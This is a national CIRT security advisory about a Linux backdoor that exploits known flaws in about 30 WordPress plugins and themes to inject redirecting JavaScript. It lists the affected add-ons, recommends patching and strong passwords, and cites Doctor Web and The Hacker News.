Description
A previously unidentified Linux malware strain that compromises weak systems is threatening WordPress websites by taking advantage of vulnerabilities in over twenty plugins and themes.
Summary
According to reports, if websites utilize older versions of these add-ons that do not have necessary patches, malicious JavaScripts are injected into the targeted web pages, causing visitors to be diverted to other websites when they click on any part of the attacked page.
The attacks involve weaponizing a list of known security vulnerabilities in 19 different plugins and themes that are installed on a WordPress site, using it to deploy an implant that can target a specific website to further expand the network. It is also capable of injecting JavaScript code retrieved from a remote server to redirect the site visitors to an arbitrary website of the attacker”s choice.
According to Doctor Web, a second version of the backdoor was identified which uses a new command-and-control (C2) domain as well as an updated list of flaws spanning 11 additional plugins, taking the total to 30.
The targeted plugins and themes include –
Easy WP SMTP
WP GDPR Compliance
Newspaper (CVE-2016-10972)
Thim Core
WP Live Chat Support
Smart Google Code Inserter (discontinued as of January 28, 2022)
Total Donations
Post Custom Templates Lite
Yuzo Related Posts
Yellow Pencil Visual CSS Style Editor
WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
WP-Matomo Integration (WP-Piwik)
ND Shortcodes
WP Live Chat
WP Quick Booking Manager
Coming Soon Page and Maintenance Mode
Hybrid
Simple Fields
Delucks SEO
Poll, Survey, Form & Quiz Maker by OpinionStage
Social Metrics Tracker
WPeMatico RSS Feed Fetcher, and
Rich Reviews
Live Chat with Messenger Customer Chat by Zotabox
Blog Designer
Brizy
FV Flowplayer Video Player
WooCommerce
Coming Soon Page & Maintenance Mode
Onetone
A second backdoor that uses a different command-and-control (C2) domain and an updated list of vulnerabilities affecting 11 more plugins, bringing the total to 30, was discovered, according to Doctor Web.
It is unclear whether the alleged inclusion of a brute-force approach for WordPress administrator accounts is a holdover from an earlier version or a feature that has not yet been deployed in either form.
Cybercriminals will even be able to successfully target some of those websites that utilize current plugin versions with fixed vulnerabilities if such a feature is added to subsequent versions of the backdoor.
Remediation
WordPress users are recommended to keep all the components of the platform up to date, including third-party add-ons and themes. It is also advised to use strong and unique logins and passwords to secure their accounts.
The Guyana National CIRT recommends that users and administrators review this alert and apply it where necessary.
PDF Download: WordPress-based websites under threat.pdf
References
News Alerts. (2022, December 30). Linux backdoor malware infects WordPress-based websites. Retrieved from DrWeb:
https://news.drweb.com/show/?i=14646&lng=en&c=23
Lakshmanan, R. (2023, January 3). WordPress Security Alert: New Linux Malware Exploiting Over Two Dozen CMS Flaws. Retrieved from TheHackerNews:
https://thehackernews.com/2023/01/wordpress-security-alert-new-linux.html